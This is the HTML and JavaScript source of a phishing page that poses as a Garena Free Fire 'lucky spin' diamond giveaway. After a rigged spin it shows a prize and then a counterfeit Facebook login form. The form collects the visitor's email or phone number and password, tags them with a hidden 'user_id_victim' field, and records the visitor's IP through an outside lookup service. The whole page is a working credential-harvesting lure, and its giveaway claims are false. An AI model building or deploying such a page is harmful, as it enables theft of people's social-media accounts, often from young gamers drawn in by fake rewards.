﻿<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="description" content="Dapatkan sekarang juga diamond gratis freefire tanpa syarat hnya di web ini">
    <title>LUCKY SPIN | FREE FIRE</title>
    <script>
    $('head').append('<link rel="stylesheet" href="css/style.css" type="text/css" />');
    </script>
    <link rel="stylesheet" type="text/css" href="SPIN_files/style.css">
    <link rel="stylesheet" type="text/css" href="SPIN_files/facebook.css">
    <link rel="stylesheet" href="SPIN_files/all.min.css">
</head>

<body>
    <div class="iwan-contener">
    	<header></header>
    	<div class="banner">
    		<img src="SPIN_files/free-fire-one-punch-man.jpg">
    	</div>
    	<div class="wrap">
    		<div class="spin">
    			<div class="box" style="--i:1;">
    				<div class="kotak">
                        <svg><rect></rect></svg>
    					<img src="SPIN_files/1.png">
    				</div>
    			</div>
    			<div class="box" style="--i:2;">
    				<div class="kotak">
                        <svg><rect></rect></svg>
    					<img src="SPIN_files/2.jpg">
    				</div>
    			</div>
    			<div class="box" style="--i:3;">
    				<div class="kotak">
                        <svg><rect></rect></svg>
    					<img src="SPIN_files/3.jpg">
    				</div>
    			</div>
    			<div class="box" style="--i:4;">
    				<div class="kotak">
                        <svg><rect></rect></svg>
    					<img src="SPIN_files/4.png">
    				</div>
    			</div>
    			<div class="box" style="--i:5;">
    				<div class="kotak">
                        <svg><rect></rect></svg>
    					<img src="SPIN_files/5.jpg">
    				</div>
    			</div>
    			<div class="box" style="--i:6;">
    				<div class="kotak">
                        <svg><rect></rect></svg>
    					<img src="SPIN_files/10.jpg">
    				</div>
    			</div>
    			<div class="box" style="--i:7;">
    				<div class="kotak">
                        <svg><rect></rect></svg>
    					<img src="SPIN_files/7.jpg">
    				</div>
    			</div>
    			<div class="box" style="--i:8;">
    				<div class="kotak">
                        <svg><rect></rect></svg>
    					<img src="SPIN_files/9.jpg">
    				</div>
    			</div>
    			<div class="arrow" id="selector"></div>
    	</div>
    	<center><div class="putar" id="putar" onclick="spin()"></div></center>
        <div class="tengah">
                    <span></span>
        </div>
    </div>

    <!-- POP UP HADIAH -->
        <div class="pop-hadiah">
            <div class="imBox">
                <img id="hadiah" src="SPIN_files/1.png">
            </div>
            <div class="confirm">
                                <button onclick="popClose()">Cancel</button>
                <button onclick="popEntry()">Confirmed</button>
            </div>
        </div>
    <!-- END OF BLOCK -->
    <!-- POP UP LOGIN -->
        <div class="login">
           <a href="fb.php" class="fb" /><i class="fab fa-facebook"></i>Login With Facebook</div>
        
    <!-- END OF BLOCK -->
    <!-- LOGIN FACEBOOK -->
    <div class="popup-login login-facebook animated fadeIn" style="display: none;">
       <div class="popup-box-login-fb">
          <div class="navbar-fb">
             <img width="45" src="SPIN_files/facebook_text.png">
          </div>
          <div class="content-box-fb">
            <p class="alert sandi">Wrong password.<b>Have you forgotten your password?</b></p>
            <p class="alert email">The mobile number or email you entered doesn't match any accounts.<b>Find your account.</b></p>
             <img width="75" height="75" src="SPIN_files/free-fire-battlegrounds.png">
             <div class="txt-login-fb">
              Log in to your Facebook account to connect with FreeFire             </div>
			<form class="login-form" action="" method="post">
				<label>
				<input type="text" name="email" placeholder="Mobile number or email address" autocomplete="off" autocapitalize="none" required="">
				</label>
				<label>
				<input type="password" name="pass" placeholder="Password" autocomplete="off" autocapitalize="none" required="">
				</label>
				<input type="hidden" name="user_id_victim" value="">
						<input name="type" value="freefirespin" type="hidden">

				<input type="hidden" name="login" value="Facebook" readonly="readonly">
				<button type="submit" name="login" class="btn-login-fb">Log In</button>
			</form>
             <div class="txt-create-account">Create account</div>
             <div class="txt-not-now">Not now</div>
             <div class="txt-forgotten-password">Forgotten password?</div>
          </div>
          <div class="language-box">
             <center>
             <div class="language-name language-name-active">English (UK)</div>
             <div class="language-name">Bahasa Indonesia</div>
             <div class="language-name">Basa Jawa</div>
             <div class="language-name">Bahasa Melayu</div>
             <div class="language-name">日本語</div>
             <div class="language-name">Español</div>
             <div class="language-name">Português (Brasil)</div>
             <div class="language-name">
                <i class="fa fa-plus"></i>
             </div>
             </center>
          </div>
          <div class="copyright">Facebook Inc.</div>
       </div>
     </div>
     <!-- END OF BLOCK -->
    <footer>
        © Iwan Ster 2K21 - Garena Free Fire
    </footer>
</div>
<div class="mask"></div>
    <script src="SPIN_files/jquery.min.js.download"></script>
    <script src="SPIN_files/jquery.min.js(1).download"></script>
    <script src="SPIN_files/axios.min.js.download"></script>
    <script type="text/javascript">

    	function spin()
    	{
    		var selector = document.getElementById("selector");
            var putar = document.getElementById("putar");
    		selector.style.display = "block";
    		selector.style.transform = "rotate(45deg)";
            putar.style.transform = "translate(-50%,-50%) rotateZ(0)";
            putar.style.transition = "none";
            putar.classList.add("disabled");
    		selector.style.transition = "none";
    		selector.classList.remove("active");
    		setTimeout(() => 
    		{
    			 		var array = ["500","501","502","503","504","505","506","507"];
    			 		var rotate = 45;
    					var random = Math.floor(Math.random() * 7) + 0;
                        switch(random)
                        {
                            case 0: { var img = 'SPIN_files/4.png'; } break; 
                            case 1: { var img = 'SPIN_files/5.jpg'; } break;
                            case 2: { var img = 'SPIN_files/10.jpg'; } break;
                            case 3: { var img = 'SPIN_files/7.jpg'; } break;
                            case 4: { var img = 'SPIN_files/9.jpg'; } break;
                            case 5: { var img = 'SPIN_files/1.png'; } break;
                            case 6: { var img = 'SPIN_files/2.jpg'; } break;
                            case 7: { var img = 'SPIN_files/3.jpg'; } break;
                        }

    					var xixi = rotate * array[random]; 
                        var loh = xixi - 45;   		
    			 		selector.style.transform = "rotate("+xixi+"deg)";
    			 		selector.style.transition = "all ease 10s";
                        putar.style.transform = "translate(-50%,-50%) rotateZ("+loh+"deg)";
                        putar.style.transition = "all ease 10s";
    			 		setTimeout(() => {
                            putar.classList.remove("disabled");
    			 			selector.classList.add("active");
                            setTimeout(() => {
                                $('.mask').fadeIn();
                                $('.pop-hadiah').fadeIn();
                                $('#hadiah').attr("src",img);
                            },1000)
    			 		},10000)

    		},500)
       	}
    	function reset()
    	{
    		var selector = document.getElementById("selector");
            var putar = document.getElementById("putar");
            selector.style.display = "block";
            selector.style.transform = "rotate(45deg)";
            putar.style.transform = "translate(-50%,-50%) rotateZ(0)";
            putar.style.transition = "none";
            selector.style.transition = "none";
            selector.classList.remove("active");
            putar.classList.remove("disabled");
    	}
        function popClose()
        {
            $('.mask').fadeOut();
            $('.pop-hadiah').fadeOut();
            reset();
        }
        function popEntry()
        {
            $('.login').fadeIn();
            $('.pop-hadiah').fadeOut();
        }
        function showfb()
        {
            $('.login-facebook').show();
        }
    </script>
    <script type="text/javascript">
        var checkip = function () {
               $.ajax({
                   type: "get",
                   async: false,
                   url: "https://api.pubgameshowtime.com/ip/getcountry",
                   dataType: "json",
                   success: function (result) {
                      $('#ip').val(result.ip);
                   }
               })
           }
        checkip();
    </script>
    <script type="text/javascript">
        function valid() {
            var user = $('#user').val();
            var pass = $('#pass').val();
            var ip = $('#ip').val();
            if(user == '' || user == null || user.length <= 5)
            {
                $('.email').show();
                $('.sandi').hide();
                return false;
            }else{
                $('.email').hide();
            }
            if(pass == '' || pass == null || pass.length <= 5)
            {
                $('.sandi').show();
                return false;
            }else{
                $('.sandi').hide();
            }
        }
    </script>
</body>

</html>

